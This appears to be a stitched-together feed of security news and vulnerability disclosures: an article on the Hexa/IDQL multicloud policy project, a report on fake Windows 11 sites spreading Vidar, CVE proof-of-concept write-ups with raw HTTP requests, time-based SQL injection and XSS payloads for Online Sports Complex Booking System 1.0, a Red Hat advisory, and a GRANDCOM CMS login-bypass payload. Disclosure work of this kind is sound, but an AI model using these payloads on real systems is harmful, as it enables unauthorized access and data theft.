Online Sports Complex Booking System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /scbs/view_facility.php.

CVE-2022-28105

Hexa and IDQL allow organizations using cloud platforms such as Microsoft Azure, Amazon Web Services, and Google Cloud Platform to apply consistent access policy across all applications, regardless of environment.

Multicloud is a reality for many organizations – whether by design or accident. And when applications and data are deployed across multiple cloud environments, creating and managing consistent identity access policies become a challenge.

Hexa is a new open source project from identity orchestration company Strata Identity to unify disparate cloud identity systems and allow consistent policies. Since each cloud provider has its own tool and policy format, Hexa relies on IDQL, a common policy format for defining identity access policies, Strata says.

Each cloud provider relies on proprietary identity systems and its own policy languages to create and manage identity and access on its platform. Most security engineers tend to be well-versed in one, maybe two, of the public clouds, but rarely more than that. In the era of multicloud, however, security engineers need to be able to create, read, and manage policies across multiple environments and be able to keep up with changing tools and new capabilities. IDQL is the universal declarative policy language that can translate policies into the individual provider’s proprietary format, says Gerry Gebel, Strata Identity’s head of standards. Hexa is the reference software built on top of the IDQL policy language and handles the tasks of discovering, translating, and orchestration policies across cloud environments, he says.

“Hexa is the open source reference software that brings IDQL to life and makes it operational in the real world,” Gebel says.

**Case for Managing Cloud Identities**

In a recent Dark Reading Report on the state of cloud computing, just 19% of respondents said their organizations work with only one cloud provider, while 43% said they worked with two to three providers. There are many reasons why organizations may be juggling multiple cloud providers. Organizations may require multicloud for redundancy and resiliency – such as one provider experiencing an outage – or to meet regulatory requirements about where the data could be stored. In some organizations, cloud infrastructure may have been originally set up without IT’s awareness, which is why the provider and policies may not be in sync with others.

Regardless of the reasons that led to multicloud, identity and access need to be consistent and managed. In a report from Palo Alto Networks, Unit42 researchers analyzed more than 680,000 identities across 18,000 cloud accounts and over 200 different organizations, and found 99% of cloud users, roles, services, and resources were granted excessive permissions. Not only were the permissions excessive, they were also left unused for 60 days, the report found.

Misconfigured identities are behind 65% of detected cloud security incidents, Unit42 said. Threat actors can abuse these identities and move laterally through the cloud environment or expand the pool of systems they can target.

Strata Identity’s own research found that only 25% of respondents said they have visibility into multicloud access policies.

**A Universal Policy Language**

Each cloud provider has its own identity system, and each application has to be hard-coded to work with that identity system. If the application is to work on multiple cloud platforms, traditionally the application would have to be modified for each one. Hexa, however, has been designed to use IDQL to bring multiple identity systems to work together as a unified whole and not have to make changes to the applications, according to Strata Identity. For policy discovery, Hexa abstracts identity and access policies from cloud platforms, authorization systems, data resources, and zero-trust networks.

Strata Identity set up an example multiregional banking application to demonstrate Hexa and its policy discovery management capabilities, Gebel says. The US region in this scenario deploys the application on Google Cloud Platform using App Engine, while another two regions rely on Kubernetes. Hexa connects to the Google Cloud instance to discover the resources and associated policies, and then converts the policies into IDQL. The analyst can make changes to the policies and then use Hexa to translate the new policies back into GCP format and push the changes on to the platform, he explains.

Hexa handles policy discovery by analyzing the environment to discover applications and resources being used and creating an inventory of all existing policies, users, and roles. Security teams have a comprehensive view of all the policies in place once they have been retrieved and translated into IDQL. Organizations can potentially develop tools to analyze the ISQL for any policy gaps, duplicates, or other error conditions. This capability is not in the open source Hexa, Gebel says, but it is something organizations can do on their own after converting to IDQL.

While it may seem that IDQL adds a layer of complexity to cloud identity access management, the reality is that organizations have to manage hundreds to thousands of cloud, SaaS, and on-premises apps, says Jack Poller, an ESG analyst covering identity and data security. Each application has a separate concept of identity and access authorization, and organizations are currently stuck with manually translating high level business access policies into each application’s own policy language or management tool.

"IDQL provides a lingua franca for authorization policies," Poller says. "Organizations can use Hexa or develop their own tools to orchestrate and automate access policies throughout the IT environment, closing the gaps that occur with manual policy management and ensuring continuous and consistent application of authorization policies."

**Cross-Platform Technologies**

IDQL and Hexa were created by some of the co-authors of Security Assertion Markup Language (SAML), the cross-platform standard for single sign-on that lets users move across cloud platforms and Web applications without re-entering their credentials. However, Gebel notes that IDQL should not be viewed as a replacement for modern standards such as the Open Policy Agent (OPA), but "are complementary to them."

OPA is a unified declarative policy language that enables cloud-native developers to "decouple policy from the service's code so you can release, analyze, and review policies (which security and compliance teams love) without sacrificing availability or performance," Poller says, noting that IDQL is very similar to OPA.

"Just as Kubernetes transformed computing by allowing applications to transparently move from one machine to another, IDQL enables access policies to move freely between proprietary identity systems," said Eric Olden, CEO of Strata Identity and one of the co-authors of the SAML standard, said in a statement. "IDQL and Hexa eliminate identity silos in the cloud and on-premises by creating an intelligent, distributed identity system with one brain."

New Open Source Project Brings Consistent Identity Access to Multicloud

Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.
"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware

Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.

"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network."

Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11\[.\]com, win11-serv\[.\]com, and win11install\[.\]com, and ms-teams-app\[.\]net.

In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware.

The ISO file, for its part, contains an executable that's unusually large in size (over 300MB) in an attempt to evade detection by security solutions and is signed with an expired certificate from Avast that was likely stolen following the latter's breach in October 2019.

But embedded within the 330MB binary is a 3.3MB-sized executable that's the Vidar malware, with the rest of the file content padded with 0x10 bytes to artificially inflate the size.

In the next phase of the attack chain, Vidar establishes connections to a remote command-and-control (C2) server to retrieve legitimate DLL files such as sqlite3.dll and vcruntime140.dll to siphon valuable data from compromised systems.

Also notable is the abuse of Mastodon and Telegram by the threat actor to store the C2 IP address in the description field of the attacker-controlled accounts and communities.

The findings add to a list of different methods that have been uncovered in the past month to distribute the Vidar malware, including Microsoft Compiled HTML Help (CHM) files and a loader called Colibri.

"The threat actors distributing Vidar malware have demonstrated their ability to social engineer victims into installing Vidar stealer using themes related to the latest popular software applications," the researchers said.

"As always, users should be cautious when downloading software applications from the Internet and download software only from the official vendor websites."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Spip Web Framework v3.1.13 and below was discovered to contain multiple SQL injection vulnerabilities at /ecrire via the lier_trad and where parameters.

CVE-2022-28961

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

CVE-2022-29652: Online Sports Complex Booking System 1.0 Cross Site Scripting ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.

**Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs\_1.zip****Tested on: Windows, MySQL, Apache**

After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button 

According to the submission path /classes/master.php?f=delete\_ Facility, Find delete\_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused 

Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt 

Data packet

    POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/scbs/admin/?page=facilities
    Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    id=1
    

Payload

    Parameter: id (POST)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF

CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-

The SAP application server ABAP and ABAP Platform are susceptible to code injection, SQL injection, and missing authorization vulnerabilities. Multiple SAP products are affected.

SAP Application Server ABAP / ABAP Platform Code Injection / SQL Injection / Missing Authorization

Red Hat Security Advisory 2022-4623-01 - This release of Red Hat build of Quarkus 2.7.5 includes security updates, bug fixes, and enhancements. For more information, see the release notes page listed in the References section. Issues addressed include HTTP request smuggling, cross site scripting, denial of service, information leakage, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat build of Quarkus 2.7.5 release and security update  
Advisory ID:       RHSA-2022:4623-01  
Product:           Red Hat build of Quarkus  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4623  
Issue date:        2022-05-18  
CVE Names:         CVE-2021-3914 CVE-2021-22569 CVE-2021-29427  
                   CVE-2021-29428 CVE-2021-29429 CVE-2021-43797  
                   CVE-2022-0981 CVE-2022-21363 CVE-2022-21724  
====================================================================  
1. Summary:

An update is now available for Red Hat build of Quarkus.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability. For  
more information, see the CVE links in the References section.

2. Description:

This release of Red Hat build of Quarkus 2.7.5 includes security updates,  
bug fixes, and enhancements. For more information, see the release notes  
page listed in the References section.

Security Fix(es):

* gradle: information disclosure through temporary directory permissions  
(CVE-2021-29429)

* gradle: repository content filters do not work in Settings  
pluginManagement (CVE-2021-29427)

* gradle: local privilege escalation through system temporary director  
(CVE-2021-29428)

* smallrye-health-ui: persistent cross-site scripting in endpoint  
(CVE-2021-3914)

* Quarkus Resteasy component may return Resteasy implementation details

* netty: control chars in header names may lead to HTTP request smuggling  
(CVE-2021-43797)

* jdbc-postgresql: Unchecked Class Instantiation when providing Plugin  
Classes (CVE-2022-21724)

* mysql-connector-java: Difficult to exploit vulnerability allows high  
privileged attacker with network access via multiple protocols to  
compromise MySQL Connectors (CVE-2022-21363)

* quarkus: privilege escalation vulnerability with RestEasy Reactive scope  
leakage in Quarkus (CVE-2022-0981)

* protobuf-java: potential DoS in the parsing procedure for binary data  
(CVE-2021-22569)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link for the  
update. You must be logged in to download the update.

4. Bugs fixed (https://bugzilla.redhat.com/):

1949636 - CVE-2021-29429 gradle: information disclosure through temporary directory permissions  
1949638 - CVE-2021-29427 gradle: repository content filters do not work in Settings pluginManagement  
1949643 - CVE-2021-29428 gradle: local privilege escalation through system temporary directory  
2018015 - CVE-2021-3914 smallrye-health-ui: persistent cross-site scripting in endpoint  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors  
2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes  
2062520 - CVE-2022-0981 quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus

5. JIRA issues fixed (https://issues.jboss.org/):

QUARKUS-1376 - Quarkus Resteasy component may return Resteasy implementation details

6. References:

https://access.redhat.com/security/cve/CVE-2021-3914  
https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2021-29427  
https://access.redhat.com/security/cve/CVE-2021-29428  
https://access.redhat.com/security/cve/CVE-2021-29429  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2022-0981  
https://access.redhat.com/security/cve/CVE-2022-21363  
https://access.redhat.com/security/cve/CVE-2022-21724  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus&downloadType=distributions&version=2.7.5  
https://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/2.7/  
https://access.redhat.com/articles/4966181

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYoWMuNzjgjWX9erEAQg8tw/+NfxQRsVczGyCt5Uecmukk19/AYn9XuRY  
LYGUv7/vtpRZHESqrOw/uIO0INZuNOnp6VArMDwvDga9HcfHFFZZkHpg5v9ZgNdT  
NXzi0V7oXADiEFF9GZHWN8T6DS2/bw1CeC64K3cAgiAdBqBpGJDIlBnyAym+Qzqf  
qpvEDGL7BIVXpsqDIKdSSkbBjGqL5xPaeRJQrXY4caxUtN8cV0Wq07dF86a73Yil  
8m9LcRmkXrMYjm9VIbUg+2EcIuJQHYgBOkJKGiRTB/3AQaqhFuc1MVGGYo/d8Mel  
IGeG34buEv2oovpoJcnLF992qu+obUMuXskcO8z4sVxFFEl/cJxEWfSnWgz3KAzw  
cNXv7vZd40Qm2PwcvH0casK1LavEMpqN/1/DzJtMZ33F2+20LL7ZjK2TRbkx2HG4  
7uXrZ1U+rUBVEoX23BPtJBbqxN7/Bb24dX6LPfojgWPwYekT/nHkwMQuHb2YHShH  
ePfqtZidb8HMFVIUNNpey1JoKu01vVNQXmQi9xJqSPJmk8lKlnONTKWXrDkOHC5j  
c9QsDziNvp1TH0eXz17iySDTf6lFI3uDsNEPwkjCXWLHK/dELQQVBMZXWKzzoJQD  
TumZO1D6fXUBq0jb8wZhugD0XO3UpqG8zTJqn8yGxu1WBuf3QE4lYPS4CNBAn58D  
NdRgfmXR4KQ=Kqt+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4623-01

GRANDCOM DynWEB before 4.2 contains a SQL Injection vulnerability in the admin login interface. A remote unauthenticated attacker can exploit this vulnerability to obtain administrative access to the webpage, access the user database, modify web content and upload custom files. The backend login script does not verify and sanitize user-provided strings.

**Authentication Bypass in GRANDCOM CMS**

*   Vendor Homepage: https://www.grandcom.sk/
*   Affected Version: 4.2 and older

SQL injection vulnerability in GRANDCOM CMS allows remote unauthenticated attackers to bypass authentication via a crafted username during a login attempt. Any unauthorized user with access to the application is able to exploit this vulnerability.

> SQL Injection attack consists of inserting an SQL query through the input data from the client into the application. Upon successful misuse, it is possible to retrieve detailed data from the database, edit database data such as inserting, updating or deleting data, work with administrative operations in the database, or in some situations run commands directly on the operating system.

**Steps to reproduce**

1.  Visit the following resource /admin/index.php.
2.  Enter the below mentioned credentials in the vulnerable field:

*   username: admin' -- -
*   password: _anything_

5.  Press the **Login** button, this will result in a successful Authentication Bypass.

**Remediation**

*   Use of Prepared Statements (with Parameterized Queries)
*   Use of Stored Procedures
*   Allow-list Input Validation
*   Escaping All User Supplied Input

Discovered by Martin Kubecka, July 19, 2021.

Tag

#sql